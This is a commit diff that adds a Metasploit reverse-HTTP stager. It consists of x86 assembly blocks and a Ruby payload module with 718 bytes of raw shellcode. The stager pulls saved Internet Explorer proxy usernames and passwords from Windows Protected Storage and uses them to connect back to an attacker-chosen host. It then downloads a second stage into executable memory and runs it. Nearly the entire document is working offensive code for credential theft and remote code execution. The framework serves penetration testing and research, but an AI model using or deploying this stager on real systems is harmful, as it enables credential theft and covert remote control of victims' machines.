Add new stager stager_reverse_http_proxy_pstore

This stager looks for proxy credentials in windows protected storage. If it finds proxy credentials, it will use them to connect back. If it does not find credentials, it will do the same as stager_reverse_http.

Works on:

- Windows Server 2003

- Windows XP

- Internet Explorer versions 4 to 6

external/source/shellcode/windows/x86/src/block/block_get_pstore_proxy_auth.asm

@@ -0,0 +1,355 @@
+;-----------------------------------------------------------------------------;
+; Author: Unknown
+; Compatible: Confirmed Windows Server 2003, IE Versions 4 to 6
+; Version: 1.0
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'
+; Output: top element of stack will be pointer to null-terminated password and second
+; will be pointer to null-terminated username of the Proxy saved in IE
+
+
+;mov edx, "1_r?"
+;call print_eax
+
+jmp after_functions
+
+alloc_memory: ; returns address to allocation in eax
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE
+  push 0x1000            ; MEM_COMMIT
+  push 0x00400000        ; Stage allocation (8Mb ought to do us)
+;  push 0x00040000	 ; other sizes don't change amount allocated (?)
+;  push 0x00000400
+  push 0                 ; NULL as we dont care where the allocation is
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXE$
+  ret
+
+after_functions:
+
+; allocate memory for variables
+
+  alloc_ppsDataLen:
+  call alloc_memory
+  push eax
+
+  alloc_ppsData:
+  call alloc_memory
+  push eax
+
+  alloc_pitemName:
+  call alloc_memory
+  push eax
+
+  alloc_pspEnumItems:
+  call alloc_memory
+  push eax
+
+  alloc_psubTypeGUID:
+  call alloc_memory
+  push eax
+
+  alloc_pEnumSubtypes:
+  call alloc_memory
+  push eax
+
+  alloc_pTypeGUID:
+  call alloc_memory
+  push eax
+
+  alloc_pEnumPStoreTypes:
+  call alloc_memory
+  push eax		 ; save on stack
+
+  alloc_pPStore:	 
+  call alloc_memory
+  push eax		 ; save on stack
+
+
+;mov edx, "2_r!"
+;call print_eax
+
+load_pstorec:		 ; loads the pstorec.dll
+  push 0x00636572        ; Push the bytes 'pstorec',0 onto the stack.
+  push 0x6f747370        ; ...
+  push esp               ; Push a pointer to the 'pstorec',0 string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "pstorec" )
+                         ; this should leave a handle to the pstorec
+                         ; DLL-Module in eax
+  mov ebx, eax		 ; save handle in ebx
+
+;  add esp, 0x08
+  pop edx		 ; remove string from stack
+  pop edx
+
+
+;mov edx, "3_r!"
+;call print_eax
+
+GetProcAddress_PStoreCreateInstance: ;we hash the function instead
+;  push 0x00000000	 ; Push Bytes 'PStoreCreateInstance', 0
+;  push 0x65636e61
+;  push 0x74736e49
+;  push 0x65746165
+;  push 0x72436572
+;  push 0x6f745350
+;  push esp		 ; Push Pointer to this String
+;  push ebx		 ; Push handle to pstorec DLL-Module
+;  push 0x7802F749        ; hash  ( "kernel32.dll", "GetProcAddress" )
+;  call ebp		 ; returns PStoreCreateInstance address in eax
+
+;  add esp, 0x18
+;  pop edx		 ; remove string from stack
+;  pop edx
+;  pop edx
+;  pop edx
+;  pop edx
+;  pop edx
+
+PStoreCreateInstance_PStore:; returns address to PStore (00942524) in pPStore (0012FEF4)
+  pop edi		 ; pop pPstore
+  push edi		 ; restore stack
+
+  push 0
+  push 0
+  push 0
+  push edi               ; arg4: pPstore
+  push  0x2664BDDB       ; hash  ( "pstorec.dll", "PStoreCreateInstance" )
+  call ebp               ; PstoreCreateInstance(address, 0, 0, 0)
+
+
+;mov edx, "4_r0"
+;call print_eax
+;mov eax, 1
+
+;  mov edx, "PCr0"	 ; Return value should be null for s_ok
+;  call print_eax
+
+;  mov eax, [edi]
+;  mov edx, "*Pr!"
+;  call print_eax
+
+PStore.EnumTypes: 	 ; returns address to EnumPStoreTypes (00942568) in pEnumPStoreTypes (0012FEE8)
+  pop eax		 ; pop pPstore
+  pop edx		 ; pop pEnumPstoreTypes
+  push edx		 ; push them again
+  push eax
+
+  push edx 		 ; arg1: pEnumPstoreTypes
+  push 0		 ; arg2: NULL
+  push 0		 ; arg3: NULL
+  mov eax, [eax]	 ; load base address of PStore in eax
+  push eax		 ; push base address of PStore (this)
+  mov edx, ebx		 ; generate function address of IPStore::EnumTypes in pstorec.dll
+  add edx, 0x00005586
+  call edx		 ; call IPStore::EnumTypes
+
+;mov edx, "5_r0"
+;call print_eax
+;mov eax, 1
+
+  mov edi, 0x5e7e8100 	 ; Value of pTypeGUID if Password is IE:Password-Protected
+EnumPStoreTypes.raw_Next:
+  pop eax		 ; pop pPStore
+  pop edx		 ; pop pEnumPStoreTypes
+  pop ecx		 ; pop pTypeGUID
+  push ecx		 ; push them again
+  push edx
+  push eax
+
+  push 0		 ; arg1: NULL
+  push ecx		 ; arg2: pTypeGUID
+  push 1		 ; arg3: 1
+  mov edx, [edx]	 ; load base address of EnumPStoreTypes (00942568)
+  push edx		 ; push base address of EnumPStoreTypes (this)
+  mov edx, ebx		 ; generate function address of EnumPStoreTypes::raw_Next in pstorec.dll
+  add edx, 0x00004E4F
+  call edx		 ; call EnumPStoreTypes::raw_Next
+
+;mov edx, "6_r0"
+;call print_eax
+;mov eax, 1
+
+;  mov eax, edi
+;  mov edx, "EDX"
+;  call print_eax
+
+  mov eax, [esp+8]
+  mov eax, [eax]
+;  mov edx, "GUID"
+;  call print_eax
+
+  mov edx, 0x00000000
+  cmp edx, eax
+  jz no_auth 		 ; no Password found 
+  cmp edi, eax		 ; do this until TypeGUID indicates "IE Password Protected sites"
+  jne EnumPStoreTypes.raw_Next
+
+
+PStore.EnumSubtypes:     ; returns address to EnumSubtypes () in pEnumSubtypes ()
+  pop eax                ; pop pPstore
+  pop edx                ; pop pEnumPstoreTypes
+  pop ecx		 ; pop pTypeGUID
+  pop edi		 ; pop pEnumSubtypes
+  push edi               ; restore stack
+  push ecx
+  push edx
+  push eax
+
+  push edi               ; arg1: pEnumSubtypes
+  push 0                 ; arg2: NULL
+  push ecx		 ; arg3: pTypeGUID
+  push 0                 ; arg4: NULL
+  mov eax, [eax]         ; load base address of PStore in eax
+  push eax               ; push base address of PStore (this)
+  mov edx, ebx           ; generate function address of IPStore::EnumSubtypes in pstorec.dll
+  add edx, 0x0000560C
+  call edx               ; call IPStore::EnumSubtypes
+
+;mov edx, "7_r0"
+;call print_eax
+;mov eax, 1
+
+EnumSubtypes.raw_Next:
+  mov eax, [esp+0x0C]    ; pop pEnumSubtypes
+  mov edx, [esp+0x10]    ; pop psubTypeGUID
+
+  push 0		 ; arg1: NULL
+  push edx		 ; arg2: psubTypeGUID
+  push 1		 ; arg3: 1
+  mov eax, [eax]	 ; load base address of EnumSubtypes in eax
+  push eax		 ; push base address of EnumSubtypes (this)
+  mov edx, ebx           ; generate function address of raw_Next in pstorec.dll
+  add edx, 0x00004E4F
+  call edx               ; call EnumSubtypes.raw_Next
+
+;mov edx, "8_r0"
+;call print_eax
+;mov eax, 1
+
+PStore.EnumItems:
+  pop eax		 ; pop pPstore
+  pop ecx
+  pop edx		 ; pop pTypeGUID
+  push edx		 ; restore stack
+  push ecx
+  push eax
+  mov ecx, [esp+0x10]    ; pop psubTypeGUID
+  mov edi, [esp+0x14]	 ; pop pspEnumItems
+
+  push edi		 ; arg1: pspEnumItems
+  push 0		 ; arg2: NULL
+  push ecx		 ; arg3: psubTypeGUID
+  push edx		 ; arg4: pTyoeGUID
+  push 0		 ; arg5: NULL
+  mov eax, [eax]         ; load base address of PStore in eax
+  push eax               ; push base address of PStore (this)
+  mov edx, ebx           ; generate function address of IPStore::Enumitems in pstorec.dll
+  add edx, 0x000056A0
+  call edx               ; call IPStore::Enumitems
+
+;mov edx, "9_r0"
+;call print_eax
+;mov eax, 1
+
+spEnumItems.raw_Next:
+  mov eax, [esp+0x14]    ; pop pspEnumItems
+  mov ecx, [esp+0x18]    ; pop pitemName
+
+  push 0		 ; arg1: NULL
+  push ecx		 ; arg2: pitemName
+  push 1		 ; arg3: 1
+  mov eax, [eax]	 ; load base address of spEnumItems in eax
+  push eax		 ; push base addres of spEnumItems (this)
+  mov edx, ebx		 ; generate function address of raw_Next in pstorec.dll
+  add edx, 0x000048D1
+  call edx
+
+;mov edx, "10r0"
+;call print_eax
+;mov eax, 1
+
+PStore.ReadItem:
+  pop eax		 ; pop pPStore
+  push eax
+
+  push 0		 ; arg1: NULL
+  push 0		 ; arg2: NULL (stiinfo not needed)
+  mov ecx, [esp+0x24]    ; pop ppsData (8. Element)
+  push ecx		 ; arg3: ppsData
+  mov ecx, [esp+0x2C]	 ; pop ppsDataLen
+  push ecx		 ; arg4: ppsDataLen (not needed?)
+  mov ecx, [esp+0x28]    ; pop pitemName (7. Element)
+  mov ecx, [ecx]
+  push ecx		 ; arg5: pitemName
+  mov ecx, [esp+0x24]    ; pop psubTypeGUID (5. Element)
+  push ecx		 ; arg6: psubTypeGUID
+  mov ecx, [esp+0x20]    ; pop pTypeGUID (3. Element)
+  push ecx		 ; arg7: pTypeGUID
+  push 0		 ; arg8: NULL
+  mov eax, [eax]	 ; load base address of PStore in eax
+  push eax		 ; push base addres of PStore (this)
+  mov edx, ebx           ; generate function address of IPStore::ReadItem in pstorec.dll
+  add edx, 0x000042B6
+  call edx
+
+;mov edx, "11r0"
+;call print_eax
+;mov eax, 1
+
+;mov edx, [esp+0x1C]
+;mov edx, [edx]
+;mov edx, [edx]
+;mov eax, [esp+0x1C]
+;mov eax, [eax]
+;mov eax, [eax]
+;call print_eax
+
+
+split_user_pass:
+  mov eax, [esp+0x1C]    ; eax = ppsData
+  mov eax, [eax]	 ; now eax contains pointer to "user:pass"
+  push eax		 ; push pointer to user
+  mov cl, byte 0x3a		 ; load ":" in ecx
+  mov dl, byte [eax]	 ; load first byte of ppsData in edx
+  cmp cl, dl
+  jz no_auth
+  loop_split:
+;  mov eax, [eax+1]
+  inc eax
+  mov dl, byte [eax]
+  cmp cl, dl
+  jnz loop_split	 ; increase eax until it points to ":"
+
+  mov [eax], byte 0x00	 ; replace ":" with 00
+  inc eax
+  push eax  		 ; push pointer to pass
+
+;pop eax
+;mov eax, [esp]
+;mov edx, [esp+4]
+;call print_eax
+
+;pop eax
+;mov eax, [eax]
+;mov edx, "13us"
+;mov edx, [esp+4]
+;call print_eax
+
+no_auth:
+
+
+
+;  mov edi, 0x00000006	  ; counter for loop
+;free_memory:		  ; returns 0, which means that it failed =(
+;  push 0x00008000
+;  push 0x00000000
+;  push 0x300F2F0B        ; hash( "kernel32.dll", "VirtualFree" )
+;  call ebp
+;  mov edx, "0Fr!"
+;  add edx, edi
+;  call print_eax
+;  dec di
+;  jnz free_memory

external/source/shellcode/windows/x86/src/block/block_reverse_http_use_proxy_auth.asm

@@ -0,0 +1,155 @@
+;-----------------------------------------------------------------------------;
+; Author: HD Moore
+; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
+; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
+; Version: 1.0
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the socket for the connection to the server
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+load_wininet:
+  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
+  push 0x696e6977        ; ...
+  push esp               ; Push a pointer to the "wininet" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "wininet" )
+
+internetopen:
+  xor edi,edi
+  push edi               ; DWORD dwFlags
+  push edi               ; LPCTSTR lpszProxyBypass
+  push edi               ; LPCTSTR lpszProxyName
+  push edi               ; DWORD dwAccessType (PRECONFIG = 0)
+  push byte 0            ; NULL pointer
+  push esp               ; LPCTSTR lpszAgent ("\x00")
+  push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+  call ebp
+
+  jmp short dbl_get_server_host
+
+internetconnect:
+  pop ebx                ; Save the hostname pointer
+  xor edi, edi
+  push edi               ; DWORD_PTR dwContext (NULL)
+  push edi               ; dwFlags
+  push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
+  push ecx               ; password
+  push edx               ; username
+  push dword 4444        ; PORT
+  push ebx               ; HOSTNAME
+  push eax               ; HINTERNET hInternet
+  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
+  call ebp
+
+  jmp get_server_uri
+
+httpopenrequest:
+  pop ecx
+  xor edx, edx           ; NULL
+  push edx               ; dwContext (NULL)
+  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200) ; dwFlags
+    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
+    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+	;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+    ;0x00000200          ; INTERNET_FLAG_NO_UI
+  push edx               ; accept types
+  push edx               ; referrer
+  push edx               ; version
+  push ecx               ; url
+  push edx               ; method
+  push eax               ; hConnection
+  push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
+  call ebp
+  mov esi, eax           ; hHttpRequest
+
+set_retry:
+  push byte 0x10
+  pop ebx
+
+httpsendrequest:
+  xor edi, edi
+  push edi               ; optional length
+  push edi               ; optional
+  push edi               ; dwHeadersLength
+  push edi               ; headers
+  push esi               ; hHttpRequest
+  push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
+  call ebp
+  test eax,eax
+  jnz short allocate_memory
+
+try_it_again:
+  dec ebx
+  jz failure
+  jmp short httpsendrequest
+
+dbl_get_server_host:
+  jmp get_server_host
+
+get_server_uri:
+  call httpopenrequest
+
+server_uri:
+ db "/12345", 0x00
+
+failure:
+  push 0x56A2B5F0        ; hardcoded to exitprocess for size
+  call ebp
+
+allocate_memory:
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE
+  push 0x1000            ; MEM_COMMIT
+  push 0x00400000        ; Stage allocation (8Mb ought to do us)
+  push edi               ; NULL as we dont care where the allocation is (zero'd from the prev function)
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+download_prep:
+  xchg eax, ebx          ; place the allocated base address in ebx
+  push ebx               ; store a copy of the stage base address on the stack
+  push ebx               ; temporary storage for bytes read count
+  mov edi, esp           ; &bytesRead
+
+download_more:
+  push edi               ; &bytesRead
+  push 8192              ; read length
+  push ebx               ; buffer
+  push esi               ; hRequest
+  push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
+  call ebp
+
+  test eax,eax           ; download failed? (optional?)
+  jz failure
+
+  mov eax, [edi]
+  add ebx, eax           ; buffer += bytes_received
+
+  test eax,eax           ; optional?
+  jnz download_more      ; continue until it returns 0
+  pop eax                ; clear the temporary storage
+
+execute_stage:
+  ret                    ; dive into the stored stage address
+
+get_server_host:
+
+;//////////////////////////////////
+;//get proxy credentials from stack
+;//////////////////////////////////
+get_proxy_auth:
+  pop esi 		 ; delete the top 3 stack elements as they are
+  pop esi 		 ; garbage from this block
+  pop esi
+
+  pop ecx 		 ; save pointer to password in ecx
+  pop edx		 ; save pointer to username in edx
+;/////////////////////////////////////////////////
+; we use the credentials only in internetconnect//
+;/////////////////////////////////////////////////
+
+  call internetconnect
+
+server_host:
+

external/source/shellcode/windows/x86/src/stager/stager_reverse_http_proxy_pstore.asm

@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 274 bytes
+; Build: >build.py stager_reverse_tcp_nx
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_get_pstore_proxy_auth.asm"
+%include "./src/block/block_reverse_http_use_proxy_auth.asm"
+  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
+

modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb

@@ -0,0 +1,121 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def self.handler_type_alias
+		"reverse_http_proxy_pstore"
+	end
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Reverse HTTP Stager Proxy',
+			'Description'   => 'Tunnel communication over HTTP',
+			'Author'        => 'hdm',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::ReverseHttp,
+			'Convention'    => 'sockedi http',
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
+							# 'EXITFUNC' => [ 290, 'V' ],
+							'LPORT'    => [ 568, 'v' ], # Not a typo, really little endian
+						},
+					'Payload' =>
+							
+# Name: stager_reverse_http_proxy_pstore
+# Length: 718 bytes
+# LEPort Offset: 568
+# ExitFunk Offset: 648
+"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+"\xEB\x16\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x6A\x00" +
+"\x68\x58\xA4\x53\xE5\xFF\xD5\xC3\xE8\xE5\xFF\xFF\xFF\x50\xE8\xDF" +
+"\xFF\xFF\xFF\x50\xE8\xD9\xFF\xFF\xFF\x50\xE8\xD3\xFF\xFF\xFF\x50" +
+"\xE8\xCD\xFF\xFF\xFF\x50\xE8\xC7\xFF\xFF\xFF\x50\xE8\xC1\xFF\xFF" +
+"\xFF\x50\xE8\xBB\xFF\xFF\xFF\x50\xE8\xB5\xFF\xFF\xFF\x50\x68\x72" +
+"\x65\x63\x00\x68\x70\x73\x74\x6F\x54\x68\x4C\x77\x26\x07\xFF\xD5" +
+"\x89\xC3\x5A\x5A\x5F\x57\x6A\x00\x6A\x00\x6A\x00\x57\x68\xDB\xBD" +
+"\x64\x26\xFF\xD5\x58\x5A\x52\x50\x52\x6A\x00\x6A\x00\x8B\x00\x50" +
+"\x89\xDA\x81\xC2\x86\x55\x00\x00\xFF\xD2\xBF\x00\x81\x7E\x5E\x58" +
+"\x5A\x59\x51\x52\x50\x6A\x00\x51\x6A\x01\x8B\x12\x52\x89\xDA\x81" +
+"\xC2\x4F\x4E\x00\x00\xFF\xD2\x8B\x44\x24\x08\x8B\x00\xBA\x00\x00" +
+"\x00\x00\x39\xC2\x0F\x84\xC0\x00\x00\x00\x39\xC7\x75\xD1\x58\x5A" +
+"\x59\x5F\x57\x51\x52\x50\x57\x6A\x00\x51\x6A\x00\x8B\x00\x50\x89" +
+"\xDA\x81\xC2\x0C\x56\x00\x00\xFF\xD2\x8B\x44\x24\x0C\x8B\x54\x24" +
+"\x10\x6A\x00\x52\x6A\x01\x8B\x00\x50\x89\xDA\x81\xC2\x4F\x4E\x00" +
+"\x00\xFF\xD2\x58\x59\x5A\x52\x51\x50\x8B\x4C\x24\x10\x8B\x7C\x24" +
+"\x14\x57\x6A\x00\x51\x52\x6A\x00\x8B\x00\x50\x89\xDA\x81\xC2\xA0" +
+"\x56\x00\x00\xFF\xD2\x8B\x44\x24\x14\x8B\x4C\x24\x18\x6A\x00\x51" +
+"\x6A\x01\x8B\x00\x50\x89\xDA\x81\xC2\xD1\x48\x00\x00\xFF\xD2\x58" +
+"\x50\x6A\x00\x6A\x00\x8B\x4C\x24\x24\x51\x8B\x4C\x24\x2C\x51\x8B" +
+"\x4C\x24\x28\x8B\x09\x51\x8B\x4C\x24\x24\x51\x8B\x4C\x24\x20\x51" +
+"\x6A\x00\x8B\x00\x50\x89\xDA\x81\xC2\xB6\x42\x00\x00\xFF\xD2\x8B" +
+"\x44\x24\x1C\x8B\x00\x50\xB1\x3A\x8A\x10\x38\xD1\x74\x0C\x40\x8A" +
+"\x10\x38\xD1\x75\xF9\xC6\x00\x00\x40\x50\x68\x6E\x65\x74\x00\x68" +
+"\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31\xFF\x57\x57" +
+"\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7\xFF\xD5\xEB\x4B\x5B\x31" +
+"\xFF\x57\x57\x6A\x03\x51\x52\x68\x5C\x11\x00\x00\x53\x50\x68\x57" +
+"\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2\x52\x68\x00\x02\x20\x84" +
+"\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x89\xC6\x6A" +
+"\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68\x2D\x06\x18\x7B\xFF\xD5" +
+"\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB\x49\xE8\xC7\xFF\xFF\xFF" +
+"\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40" +
+"\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5" +
+"\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68" +
+"\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0" +
+"\x75\xE5\x58\xC3\x5E\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"
+
+
+				}
+			))
+	end
+
+	#
+	# Do not transmit the stage over the connection.  We handle this via HTTPS
+	#
+	def stage_over_connection?
+		false
+	end
+
+	#
+	# Generate the first stage
+	#
+	def generate
+		p = super
+		i = p.index("/12345\x00")
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
+		p[i, u.length] = u
+		p + datastore['LHOST'].to_s + "\x00"
+	end
+
+	#
+	# Always wait at least 20 seconds for this payload (due to staging delays)
+	#
+	def wfs_delay
+		20
+	end
+end